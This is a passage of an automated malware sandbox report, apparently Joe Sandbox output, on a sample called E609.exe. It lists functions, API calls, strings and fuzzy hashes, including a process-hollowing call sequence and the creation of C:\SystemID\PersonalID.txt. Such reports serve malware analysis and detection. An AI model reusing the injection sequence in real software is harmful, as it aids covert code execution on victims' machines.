Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96

Function 004516A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON

Download Yara Rule

Strings

unknown, xrefs: 0045175D
.\crypto\err\err.c, xrefs: 004516A5, 004516C4, 004516DB, 004516EE, 0045170D, 00451777

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID:
String ID: .\crypto\err\err.c$unknown
API String ID: 0-565200744
Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E

Function 0042A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
___raise_securityfailure.LIBCMT ref: 0042AC7A

Strings

8Q, xrefs: 0042AC75

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8Q
API String ID: 3761405300-2096853525
Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45

Function 00413C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0

Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64

_memset.LIBCMT ref: 00413C83

Strings

vector<T> too long, xrefs: 00413C96

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
String ID: vector<T> too long
API String ID: 1327501947-3788999226
Opcode ID: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
Opcode Fuzzy Hash: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9

Function 0040C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
_fputws.LIBCMT ref: 0040C9C6
_fputws.LIBCMT ref: 0040C9E8
_fputws.LIBCMT ref: 0040C9F3

Strings

C:\SystemID, xrefs: 0040C946
C:\SystemID\PersonalID.txt, xrefs: 0040C956

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _fputws$CreateDirectory
String ID: C:\SystemID$C:\SystemID\PersonalID.txt
API String ID: 2590308727-54166481
Opcode ID: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
Opcode Fuzzy Hash: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA

Function 00420DB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00420DD5
__calloc_crt.LIBCMT ref: 00420DEE

Strings

Assertion failed: %s, file %s, line %d, xrefs: 00420E13

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: __calloc_crt
String ID: Assertion failed: %s, file %s, line %d
API String ID: 3494438863-969893948
Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699

Function 00480620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00480686

Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18

Strings

ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
.\crypto\evp\digest.c, xrefs: 00480638

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memset_raise
String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
API String ID: 1484197835-3867593797
Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99

Function 0044F23E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0044F251

Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15

__CxxThrowException@8.LIBCMT ref: 0044F266

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

Strings

TeM, xrefs: 0044F25B, 0044F247

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID: TeM
API String ID: 757275642-2215902641
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99

Analysis Process: E609.exePID: 2844, Parent PID: 7048COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	97.4%
Signature Coverage:	0%
Total number of Nodes:	39
Total number of Limit Nodes:	7

Executed Functions

Function 04A70110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 04A70156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 04A7016C
CreateProcessA.KERNELBASE(?,00000000), ref: 04A70255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04A70270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 04A70283
Wow64GetThreadContext.KERNEL32(00000000,?), ref: 04A7029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 04A702C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 04A702E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 04A70304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 04A7032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 04A70399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 04A703BF
Wow64SetThreadContext.KERNEL32(00000000,?), ref: 04A703E1
ResumeThread.KERNELBASE(00000000), ref: 04A703ED
ExitProcess.KERNEL32(00000000), ref: 04A70412

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 93872480-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: bf6f061cb1ebf8da9060c8a47effb6cbd3db80cd6f67adc560ac3dbbccc3ac12
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: 00B1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E909AB391D771AE41CF94

Function 04A70420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 04A70533

Strings

0, xrefs: 04A70492
saodkfnosa9uin, xrefs: 04A704DA
mfoaskdfnoa, xrefs: 04A70520, 04A70523
d, xrefs: 04A70584

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: 09c48fc7d90949afaf1c54c641d67a7f4f3368e78fc0e8ad3cb4a64cc1109d19
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: F8512B70D08388DEEB11CBE8C849BDEBFB26F15708F144058D5447F286C3BA6658CBA6

Function 04A705B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 04A705EC

Strings

o, xrefs: 04A70600
apfHQ, xrefs: 04A705E2, 04A705E5

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: 1cba4aba3901f09423234bcefab7ab508c09818f8ee73bd65666ae7d776a33a8
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: 47011E70C0824CEEDB10DB98C9583AEBFB5AF51308F148099C4092B242D7B69B58CBA1

Function 049DC7C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 049DC7EE
Module32First.KERNEL32(00000000,00000224), ref: 049DC80E

Memory Dump Source

Source File: 0000000E.00000002.2060271846.00000000049DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 049DC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_49dc000_E609.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 938fe22553eef8e46dd21322700387e8ed87b8c8727ac32e04b2729b49f15424
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: F2F06D326007116BE7203BF9A88DE6A76ECAF89765F108638E643D10C0DB70F8458A61

Function 049DC485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 049DC4D6

Memory Dump Source

Source File: 0000000E.00000002.2060271846.00000000049DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 049DC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_49dc000_E609.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 870f8ffe0f78ac1a0a4ad46dc0af8c7c3c909e4641186c28f100c3ec7ba386b5
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 81113C79A00208EFDB01DF98C985E99BBF5AF08350F05C0A4F9489B361D771EA90EF80

Non-executed Functions

Function 04A96437 Relevance: 18.1, APIs: 12, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__calloc_crt.LIBCMT ref: 04A9644E

Part of subcall function 04A99636: __calloc_impl.LIBCMT ref: 04A99645

__calloc_crt.LIBCMT ref: 04A96472
_free.LIBCMT ref: 04A96480
__calloc_crt.LIBCMT ref: 04A9648E
_free.LIBCMT ref: 04A9649E
_free.LIBCMT ref: 04A964A4
__copytlocinfo_nolock.LIBCMT ref: 04A964B3
__setmbcp_nolock.LIBCMT ref: 04A964D4
_free.LIBCMT ref: 04A964E2
___removelocaleref.LIBCMT ref: 04A964E9
___freetlocinfo.LIBCMT ref: 04A964F0
_free.LIBCMT ref: 04A964F6

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
String ID:
API String ID: 1442030790-0
Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction ID: 483359d922d97db34e46345095c7680d6ac03fdc5df9afb7a07881ba9735a53d
Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction Fuzzy Hash: 4121AE36604601ABFF227FA5DB02E4B7BE8DF85768F508029E485591A0EA22BD50DA51

Function 04A93F16 Relevance: 16.8, APIs: 11, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 04A93F51

Part of subcall function 04A95BA8: __getptd_noexit.LIBCMT ref: 04A95BA8

__gmtime64_s.LIBCMT ref: 04A93FEA
__gmtime64_s.LIBCMT ref: 04A94020
__gmtime64_s.LIBCMT ref: 04A9403D
__allrem.LIBCMT ref: 04A94093
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A940AF
__allrem.LIBCMT ref: 04A940C6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A940E4
__allrem.LIBCMT ref: 04A940FB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A94119
__invoke_watson.LIBCMT ref: 04A9418A

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: accb30e3cb9e20145b50b900ef12684cb5b31a9e4cac4d113bded697e977d729
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: 4A71E471A05716BBEF149F69CD40B6AB3F8AF18368F14822AE914DB2C0E770FD118790

Function 04A9650E Relevance: 16.6, APIs: 11, Instructions: 131
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__invoke_watson.LIBCMT ref: 04A96547
__calloc_crt.LIBCMT ref: 04A96598
__lock.LIBCMT ref: 04A965AE
__copytlocinfo_nolock.LIBCMT ref: 04A965BF
_wcscmp.LIBCMT ref: 04A965F9
__lock.LIBCMT ref: 04A96610
__updatetlocinfoEx_nolock.LIBCMT ref: 04A96622
___removelocaleref.LIBCMT ref: 04A96628
__updatetlocinfoEx_nolock.LIBCMT ref: 04A96647

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
String ID:
API String ID: 3432600739-0
Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction ID: 6b63f4db43f464435dbeca844c1246b79dc4ed9d799355f8a05bbfc129527bac
Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction Fuzzy Hash: 5F411532904305AFEF05AFA4DE41B9E3BF8AF48718F10842DEA1496290DB75BD45DB11

Function 04A984AB Relevance: 16.6, APIs: 11, Instructions: 92
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 04A984B1
_free.LIBCMT ref: 04A984E2
_free.LIBCMT ref: 04A984F5
_free.LIBCMT ref: 04A98513
_free.LIBCMT ref: 04A98525
_free.LIBCMT ref: 04A98536
_free.LIBCMT ref: 04A98541
_free.LIBCMT ref: 04A98565
_free.LIBCMT ref: 04A98581
_free.LIBCMT ref: 04A98597
_free.LIBCMT ref: 04A985BF

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: _free$ExitProcess___crt
String ID:
API String ID: 1022109855-0
Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction ID: 69fe4ad3d7aa6420a38e8b420b63927dc30ec88610e69628fc55e978541e795c
Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction Fuzzy Hash: F831C331900651DFEFA1AF14FC8084977E4FB19324B05866EE9055B2B0CBB8BDC9AF94

Function 04ABFC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 04ABFC1F

Part of subcall function 04AA169C: std::exception::_Copy_str.LIBCMT ref: 04AA16B5

__CxxThrowException@8.LIBCMT ref: 04ABFC34
std::exception::exception.LIBCMT ref: 04ABFC4D
__CxxThrowException@8.LIBCMT ref: 04ABFC62
std::regex_error::regex_error.LIBCPMT ref: 04ABFC74

Part of subcall function 04ABF914: std::exception::exception.LIBCMT ref: 04ABF92E

__CxxThrowException@8.LIBCMT ref: 04ABFC82
std::exception::exception.LIBCMT ref: 04ABFC9B
__CxxThrowException@8.LIBCMT ref: 04ABFCB0

Strings

leM, xrefs: 04ABFCA8

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
String ID: leM
API String ID: 3569886845-2926266777
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: a6541e7984985468b5c9c8927acc405afb5eebed1198dcf639054d5dd17bce75
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: 1811F879C0020DBBCF00FFA5D955CEEBBBCAB04348F448566AD2497241EB74B7588B95

Function 04A7F010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 04A7F01F

Part of subcall function 04A91602: __FF_MSGBANNER.LIBCMT ref: 04A91619
Part of subcall function 04A91602: __NMSG_WRITE.LIBCMT ref: 04A91620

_malloc.LIBCMT ref: 04A7F02B
_wprintf.LIBCMT ref: 04A7F03E
_free.LIBCMT ref: 04A7F044
_free.LIBCMT ref: 04A7F065
_malloc.LIBCMT ref: 04A7F06D
_sprintf.LIBCMT ref: 04A7F0C0
_wprintf.LIBCMT ref: 04A7F0D2
_wprintf.LIBCMT ref: 04A7F0DC
_free.LIBCMT ref: 04A7F0E5

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$_sprintf
String ID:
API String ID: 3721157643-0
Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction ID: 96d1a6c9cd1a461373d6ac98e24e9035cc3530b8d16006589fbb35c0af7ffe90
Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction Fuzzy Hash: AB11D2B29005547AFB61B7B55D11EFF7AEC9F45706F0400A9FB88D5180EA186F0593B1

Function 04A81960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 04A819C6
__CxxThrowException@8.LIBCMT ref: 04A819F1
__CxxThrowException@8.LIBCMT ref: 04A81A1A
__CxxThrowException@8.LIBCMT ref: 04A81A4B
_memset.LIBCMT ref: 04A81A6A
__CxxThrowException@8.LIBCMT ref: 04A81A90
_malloc.LIBCMT ref: 04A81AA0
_memset.LIBCMT ref: 04A81AAB
_sprintf.LIBCMT ref: 04A81ACE

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset$_malloc_sprintf
String ID:
API String ID: 65388428-0
Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction ID: a23c8a9633ad9a53118170533cb9d798ca1eb8f72874e134a3652569f24cfa7a
Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction Fuzzy Hash: 97513C71D40209BBEB11EBA5DD85FEFBBB8FB04744F140129F905B6180E7746A058BA5

Function 04A7F210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 04A7F284
__CxxThrowException@8.LIBCMT ref: 04A7F2AF
__CxxThrowException@8.LIBCMT ref: 04A7F2DE
__CxxThrowException@8.LIBCMT ref: 04A7F30F
_memset.LIBCMT ref: 04A7F32E
__CxxThrowException@8.LIBCMT ref: 04A7F354
_sprintf.LIBCMT ref: 04A7F373

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction ID: fddabc6e071a7bfa2f291105f4d05b8ab4102894e4ad2ee4bf6cda9c448f9230
Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction Fuzzy Hash: E55160B1E40209BEEF11DFA1DD46FEEBBB8EB04704F100029F911B6180E775BA058BA5

Function 04A7F440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 04A7F4B7
__CxxThrowException@8.LIBCMT ref: 04A7F4E2
__CxxThrowException@8.LIBCMT ref: 04A7F504
__CxxThrowException@8.LIBCMT ref: 04A7F535
_memset.LIBCMT ref: 04A7F554
__CxxThrowException@8.LIBCMT ref: 04A7F57A
_sprintf.LIBCMT ref: 04A7F594

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction ID: b61e97f41f53ab174b57a48575313f59950964bd9001a17512506285a439bc02
Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction Fuzzy Hash: 8D513F71E40209AAEF21DFA5DD45FEEBBB8FB08704F140129F915B7180E774AA058BA5

Function 04AB208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

__getenv_helper_nolock.LIBCMT ref: 04AB20C6
